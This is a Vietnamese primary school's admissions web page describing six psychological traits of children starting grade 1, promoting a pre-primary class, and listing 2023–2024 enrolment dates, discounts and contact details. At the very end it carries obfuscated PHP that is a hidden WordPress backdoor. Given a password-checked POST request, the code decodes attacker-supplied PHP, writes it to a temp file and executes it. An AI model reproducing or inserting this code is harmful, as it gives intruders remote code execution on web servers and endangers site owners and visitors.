Tư vấn tuyển sinh vào lớp 1: 6 đặc điểm tâm lý ba mẹ cần biết

4/5 - (2 bình chọn)

Thời điểm trẻ bắt đầu lên lớp 1 cũng là khi con bắt đầu một hành trình học tập mới với nhiều hoạt động hơn khiến con còn sợ sệt, bỡ ngỡ. Bởi vậy chuẩn bị cho con một tinh thần tốt cũng là việc ba mẹ nên chú trọng trong khoảng thời gian trước lịch tuyển sinh vào lớp 1 diễn ra. Nằm trong hoạt động tư vấn tuyển sinh vào lớp 1 của Eraschool, dưới đây là những đặc điểm tâm lý của trẻ trong giai đoạn này mà nhà trường muốn chia sẻ tới quý phụ huynh!

6 đặc điểm tâm lý của trẻ vào lớp 1

Đặc điểm đầu tiên và có lẽ cũng là điểm phụ huynh dễ nhận định được đó là khả năng tập trung của con trong giai đoạn đầu còn hạn chế. Con cũng dễ bị phân tán tư tưởng bởi những âm thanh, sự kiện vui khác trong lúc đang học. Bởi thế, những môn học có nội dung thú vị, nhiều tranh ảnh, kết hợp trò chơi… sẽ giúp các con chú ý hơn. Thời gian tập trung nhất là trong khoảng 25 – 30 phút.

Chuẩn bị tâm lý cho con trước khi đi học là rất quan trọng
Chuẩn bị tâm lý cho con trước khi đi học là rất quan trọng

Thứ 2, tri giác của các con trong giai đoạn này cũng không đi vào chi tiết mà cần gắn với hình ảnh trực quan để các con dễ tưởng tượng. Ba mẹ ở nhà dạy con học có thể thu hút con bằng các hoạt động nhiều màu sắc, sáng tạo, mới mẻ để kích thích con cảm nhận tốt hơn.

Điều thứ 3, so với cấp mầm non thì tưởng tượng của các con bây giờ đã phong phú hơn rất nhiều nhưng vẫn còn đơn giản, chưa bền vững và dễ thay đổi. Ba mẹ có thể giúp con phát triển tư duy bằng cách biến những nội dung khô khan trở nên có cảm xúc hơn. Đây có lẽ là điều các bậc phụ huynh đã được nghe đến nhiều khi tham gia tư vấn tuyển sinh vào lớp 1.

Thứ 4, hầu hết các con đã học nói thành thạo ở mầm non nên khi vào lớp 1, bắt đầu xuất hiện ngôn ngữ viết thì mới đầu con sẽ rất hứng thú. Sự hứng thú này là do con bắt đầu có khả năng tự đọc, tự học, tự nhận thức được. Vậy nên đây là ba mẹ phải hết sức lưu ý để trau dồi thêm vốn ngôn ngữ cho con trong giai đoạn này.

Ở tuổi này, các con sẽ thích học mà chơi - chơi mà học
Ở tuổi này, các con sẽ thích học mà chơi – chơi mà học

Thứ 5, trong chương trình lớp 1 con sẽ bắt đầu học ghi nhớ nhưng con nhớ máy móc là chủ yếu. Vì giai đoạn này con còn chưa quen với việc khái quát kiến thức, lập dàn bài để ghi nhớ. Nên nếu ba mẹ giúp con khái quát các kiến thức được học và dùng từ ngữ diễn đạt dễ hiểu, dễ nắm bắt thì con sẽ cảm thấy hứng thú với việc học hơn.

Thứ 6, ở độ tuổi này hành vi thực hiện của con phụ thuộc vào yêu cầu của người lớn. Sự điều chỉnh ý chí với hành động ở các em còn yếu nên ba mẹ hãy trở thành một tấm gương cho con học tập và hành động theo nhé!

Lớp tiền tiểu học – chuẩn bị tâm lý vững vàng cho con

Lớp tiền tiểu học của Eraschool cho con một tâm lý vững vàng trước khi vào lớp 1
Lớp tiền tiểu học của Eraschool cho con một tâm lý vững vàng trước khi vào lớp 1

6 Đặc điểm tâm lý ở trên là những điều nhận thấy rất rõ ràng ở các bé đang trong giai đoạn chuẩn bị bước vào lớp 1. Nên kỳ tư vấn tuyển sinh vào lớp 1 nào cũng thế, trường Eraschool luôn khuyến khích phụ huynh chuẩn bị cho con một tâm lý vững vàng với lớp tiền tiểu học:

  • Lớp tiền tiểu học của trường Eraschool cho các con được học hàng ngày ngoài trời, giữa thiên nhiên chứ không bó hẹp trong không gian lớp học.
  • Các con được chú trọng trải nghiệm cuộc sống hơn là các kiến thức lớp một khô khan và khó hiểu. Ví dụ, con được học cách chăm sóc vật nuôi, được tự tay trồng cây, được học cách quý trọng thực phẩm mình ăn hàng ngày…

Lớp tiền tiểu học của trường Eraschool sẽ diễn ra cả năm. Nếu ba mẹ quan tâm thông tin chi tiết, ba mẹ hãy đăng ký tư vấn hồ sơ tuyển sinh vào lớp 1 để được tư vấn tốt nhất.

Thông tin tuyển sinh Eraschool

Poster tuyển sinh 2023-2024

Lịch tuyển sinh vào lớp 1 trường Eraschool hiện tại đã có thông tin tuyển sinh cho năm học 2023 – 2024 như sau:

Thời gian tuyển sinh trực tuyến từ ngày 1/7 trong đó các em khối 1 là từ ngày 1/7 đến 3/7 năm 2023

Thời gian tuyển sinh trực tiếp từ ngày 13/7 đến hết ngày 18/7/2023.

CHÍNH SÁCH ƯU ĐÃI:
– Áp dụng chính sách ưu đãi theo năm học và lộ trình theo từng cấp học. Mỗi năm nhà trường sẽ
có một lộ trình ưu đãi cho lứa học sinh mới.
– Ưu đãi 5% học phí chính khóa cho anh/ chị/ em ruột thứ 2 và 20% phí xe buýt cho cả hai học sinh
khi theo học tại trường Eraschool.
– Ưu đãi 5% học phí chính khóa khi phụ huynh học sinh đóng toàn bộ phí cả năm học.

Để được tư vấn tuyển sinh vào lớp 1, phụ huynh vui lòng liên hệ Bộ phận tuyển sinh theo số điện thoại 0899 889 818 hoặc 036 869 2626 để được giải pháp mọi thắc mắc. Cảm ơn phụ huynh đã theo dõi bài viết này cùng trường Eraschool!

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}